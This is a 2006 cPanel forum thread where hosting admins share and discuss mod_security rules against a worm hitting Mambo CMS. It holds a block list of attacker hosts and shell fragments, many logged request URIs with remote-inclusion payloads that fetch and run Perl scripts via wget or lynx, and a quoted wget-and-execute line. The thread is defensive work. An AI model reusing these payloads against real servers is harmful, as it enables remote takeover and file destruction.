Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

New Rootkit going around... ModSec Rules + More...

Discussion in 'Security' started by HostMerit, Jan 27, 2006.

Page 1 of 3
  1. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Seems like a new rootkit is going around, well many, but this one seems to be the massive one. I have made additions / made my Mod_Security rules easier to read / cleaned it up some.

    I suggest adding these new rules ASAP because on all of my servers, I'm getting many many blocked requests every hour.

    I request if any server security expert / website uses my rules to post them on their website / mod security , please give credit where credit is due.

    See the Rules below and some corresponding URLs below that.

    My new set of mod security rules is available for download directly from:
    http://www.hostmerit.com/modsec.user.conf

    There are also new rules that I have personally found by going through Apache domlogs etc, as well as new rootkits spreading, but I suggest EVERYONE add the rules below ASAP to their server.


    Code:
    # Added Jan 20 by kris from honeypot domlogs - Brand new Rootkits etc
SecFilter "mosConfig_absolute_path"
SecFilterSelective THE_REQUEST "tool\.gif"
SecFilterSelective THE_REQUEST "tool25\.txt"
SecFilter "perl\x20xx\.txt"
SecFilter "sweet-serenity\.org"
SecFilterSelective THE_REQUEST "sess3025"
SecFilter "mosConfig_absolute_path=http"
SecFilter "echo\x20YYY"
SecFilter "cmd\.gif?"
SecFilter "\x20bash;"
SecFilter "200\.72\.130\.29"
SecFilter "200\.207\.91\.25"
SecFilter "62\.23\.221\.67"
SecFilter "147\.142\.142\.24"
SecFilter "62\.23\.221\.67 "
SeCFilter "202\.143\.140\.151"
SecFilterSelective THE_REQUEST "killop"
SecFilterSelective THE_REQUEST "\/bash;chmod"

    This is spreading quickly, and many variable versions are out there, as seen below:
    Code:
    path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
[Thu Jan 26 08:52:59 2006] [error] [client 213.193.214.66] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
[Thu Jan 26 08:53:53 2006] [error] [client 213.193.229.178] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
[Thu Jan 26 08:53:53 2006] [error] [client 213.193.229.178] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
[Thu Jan 26 08:56:04 2006] [error] [client 160.114.81.20] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
[Thu Jan 26 08:56:04 2006] [error] [client 160.114.81.20] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
[Thu Jan 26 09:26:24 2006] [error] [client 195.204.38.161] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.cuti.ch/cuti/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
[Thu Jan 26 09:26:25 2006] [error] [client 195.204.38.161] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.cuti.ch/cuti/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
[Thu Jan 26 09:26:45 2006] [error] [client 80.64.129.254] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
[Thu Jan 26 09:26:45 2006] [error] [client 80.64.129.254] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
[Thu Jan 26 09:27:43 2006] [error] [client 81.94.11.2] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
[Thu Jan 26 09:27:43 2006] [error] [client 81.94.11.2] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
[Thu Jan 26 09:30:53 2006] [error] [client 82.112.90.23] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lynx%20http://www.cuti.ch/cuti/sess3024_%20>%20sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
[Thu Jan 26 09:30:53 2006] [error] [client 82.112.90.23] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lynx%20http://www.cuti.ch/cuti/sess3024_%20>%20sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
[Thu Jan 26 09:33:21 2006] [error] [client 62.75.156.220] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    Comments and suggestions welcome.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #1 HostMerit, Jan 27, 2006
    Last edited: Jan 27, 2006
  2. simplestar

    simplestar Well-Known Member

    Joined:
    Nov 15, 2005
    Messages:
    97
    Likes Received:
    0
    Trophy Points:
    156
    Very well recommended mod_sec rules. I've been using them since your initial generous offering a few months ago :D and my logs without a doubt, show they're doing a great job. I omitted a few rules because they didn't apply to my server and just got a copy of your new rules. Thank you very much for providing them to us and will undoubtedly speak good words of your skill. :)

    BTW I'm getting them too.
    Code:
    echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillo
     
    #2 simplestar, Jan 27, 2006
  3. simplestar

    simplestar Well-Known Member

    Joined:
    Nov 15, 2005
    Messages:
    97
    Likes Received:
    0
    Trophy Points:
    156
    OMG in all that, I forgot to say 'Thank you, Kris' :eek:
     
    #3 simplestar, Jan 27, 2006
  4. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    166
    Most rootkits are installed via wget, perl, lynx or some other form of downloadable way. Simply restricting these and a few others would stop all of the above, wouldn't it?
     
    #4 jackie46, Jan 27, 2006
    Last edited: Jan 27, 2006
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Some yes, some no - Proof in concept:

    Instead of using wget / using perl to download and execute, what if they used another system binary, say rm and did rm -rf /home/* to which would in essence clear any file chowned by nobody and chmod 777 in /home - Between galleries alone, and poorly written PHP scripts, alot of files.

    Regardless it's a new way into your machine and a new way for unknown users to run shell code on your machine, personally I feel insecure with that ;)

    It's your choice :rolleyes:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #5 HostMerit, Jan 27, 2006
    Last edited: Jan 28, 2006
  6. Myacen

    Myacen Well-Known Member

    Joined:
    Apr 6, 2002
    Messages:
    222
    Likes Received:
    0
    Trophy Points:
    316
    Cheers Kris for the updated rules.

     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #6 Myacen, Jan 28, 2006
  7. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    166
    Do these work with v1.9 or are these still for 1.8?
     
    #7 jackie46, Jan 28, 2006
  8. simplestar

    simplestar Well-Known Member

    Joined:
    Nov 15, 2005
    Messages:
    97
    Likes Received:
    0
    Trophy Points:
    156
    I'm using ModSec 1.9 and HostMerit's work fine.
     
    #8 simplestar, Jan 28, 2006
  9. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Both - Shouldnt have issues with either - Didnt use many 1.9 features and stripped them from the public version
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #9 HostMerit, Jan 28, 2006
  10. Bulent Tekcan

    Bulent Tekcan Well-Known Member

    Joined:
    May 11, 2004
    Messages:
    180
    Likes Received:
    0
    Trophy Points:
    166
    When I use that conf my server loads goes 100-110 :confused:
     
    #10 Bulent Tekcan, Jan 29, 2006
  11. MMarko

    MMarko Well-Known Member

    Joined:
    Apr 18, 2005
    Messages:
    316
    Likes Received:
    0
    Trophy Points:
    166
    There is one universal solution to these problems. Just disable wget, lynx, gcc for all users except root.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #11 MMarko, Jan 29, 2006
  12. hmm

    hmm Well-Known Member

    Joined:
    Jan 11, 2006
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    India
    I have been hardly hit by this worm for last few days...Thanks to my mod_security rules for protecting the server...

    Basically its attacking mambo CMS but the problem here is...I was getting approx 50+ attacks in less than one minute...

    and this was making my server real slow and increasing load...

    So for me final solution was to terminate that account from server and ask the client to point their nameserver to somewhere else.. :(

    Following mod_security rule helped me...

    Code:
    SecFilterSelective THE_REQUEST "wget "

    but the disadvantage of mod_security is..even after deleting index.php file from that location, mod_security will show 406 error rather than letting apache show 404....

    So these bots will never know that file is gone..and the attacks does not stop....

    Deep
    Deep
     
    #12 hmm, Jan 29, 2006
  13. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    862
    Likes Received:
    3
    Trophy Points:
    168
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    That's something that's always made me a little shy of too large a set of rules. The ruleset I am using seems much simpler than HostMerit's generous contribution, and HostMerit's seem much simpler than those at gotroot.com. My server load is good. I have read lot's of posts cautioning and complaining of high server loads when using something as extensive as gotroot.com's. I wish I knew how much is going to be too much :) I'm fortunate in that my company manages most of the 100 or so domains on our server, and I know for sure exactly what is and isn't installed, and don't have to worry about attacks at some specific things.

    Still... would be nice to know how many rules is going to be too much. There probably so many other variables on server load that you'd really have to just try and watch and then try some more and repeat :)
     
    #13 verdon, Jan 29, 2006
  14. hmm

    hmm Well-Known Member

    Joined:
    Jan 11, 2006
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    India
    actually I am also afraid to use large ruleset because of load problem...(still this single wget rule also caused high load on my server)

    I use simple ruleset provided here
     
    #14 hmm, Jan 29, 2006
  15. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    862
    Likes Received:
    3
    Trophy Points:
    168
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    Me too pretty much... with a couple things I picked up here and there.
     
    #15 verdon, Jan 29, 2006
  16. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    If you'll see some of eth0's rules were direct pulls of mine, so essentially you're still using my rules :p

    One of my servers is a Dual Xeon and has around 700 domains with no issue with this configuration, load only goes above 1 during backups and updatedb.

    I used to have a much larger config, this one is acutally stripped down alot.

    If it doesnt work for you dont use it :D
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #16 HostMerit, Jan 29, 2006
  17. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    862
    Likes Received:
    3
    Trophy Points:
    168
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    Please don't misunderstand me, I appreciate your effort :) I have been looking at them and likely will try at least parts of them, if not all. They seem well thought out and are well commented. I can see which ones are probably unnecessary for my particular server, so I suppose I might as well comment them out.

    salut,
     
    #17 verdon, Jan 29, 2006
  18. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    862
    Likes Received:
    3
    Trophy Points:
    168
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    FYI... I've been trying the rules for a few hours now, and see no significant increase in CPU load (maybe a tiny one but negligible) or any obvious problems. Thanks Kris :)

    I did see one side effect though...

    There is a rule just below the fantastico stuff that reads
    SecFilterSelective THE_REQUEST "cp\x20"

    I discovered by coincidence that one of my clients has an old CMS that allows them to upload images for content, without cleaning spaces and such out of the names. They have a number of images in their site that just happen to be named along the lines of 'CP Station Oct 04 002.jpg' and 'CP Station Oct 04 003.jpg' and so on. These translate to 'CP%20Station%20Oct%2004%20002.jpg' at request time and trigger the mod_security block.

    So, here's an opportunity for a question...

    Is this a case I should be able to add some sort of exclusion near the top?

    regards,
     
    #18 verdon, Jan 30, 2006
  19. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    8
    Trophy Points:
    193
    Just a little trick I use when deleting accounts ....

    I tell the server to leave the DNS for the web account that I delete and
    then edit the DNS file and change all IP numbers to "0.0.0.0".

    Anyone attempting to connect to that domain will get a resolution of "0.0.0.0"
    and since that is what is returned on DNS resolution failures, their
    computers will assume that no IP could be found for the domain
    and not even attempt any web connection to your server.

    If you just delete everything then you will still get a large amount of
    traffic trying to directly connect to the IP number where that site used
    to be located even after the site and the DNS are deleted. However,
    if you do what I said above then that excess traffic will taper off
    and disappear very quickly -- sometimes within minutes.
     
    #19 Spiral, Jan 30, 2006
  20. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Why not change it to 127.0.0.1 thats what I have done to a domains that were being pounded, reroute the traffic to the local server resulting in a higher and higher CPU load for the server attacking? Seems more fun than 0.0.0.0 to me.

    :rolleyes:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #20 HostMerit, Jan 30, 2006
(You must log in or sign up to post here.)
Page 1 of 3
Loading...
Similar Threads - Rootkit going around
  1. denverdataman

    Resolving Issues Found With Rootkit Hunter

    denverdataman, Jan 22, 2018, in forum: Security
    Replies:
    3
    Views:
    183
    cPanelMichael
    Jan 23, 2018
  2. Spork Schivago

    Custom Chkrootkit

    Spork Schivago, Aug 2, 2016, in forum: Workarounds and Optimization
    Replies:
    21
    Views:
    1,894
    Spork Schivago
    Sep 4, 2016
  3. rudtek

    New Thread how to montitor server going to power state 4

    rudtek, Jun 17, 2018 at 1:51 PM, in forum: General Discussion
    Replies:
    3
    Views:
    17
    Jcats
    Jun 17, 2018 at 2:59 PM
  4. Remitur

    How to use multiple IP for outgoing email?

    Remitur, Jun 14, 2018 at 10:31 AM, in forum: E-mail Discussion
    Replies:
    2
    Views:
    44
    dalem
    Jun 15, 2018 at 10:12 AM
  5. joaosavioli

    How to identify user sending syn tcp outgoing attack?

    joaosavioli, Jun 11, 2018 at 5:46 PM, in forum: Security
    Replies:
    1
    Views:
    51
    cPanelMichael
    Jun 12, 2018 at 1:47 PM

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...
    Dismiss Notice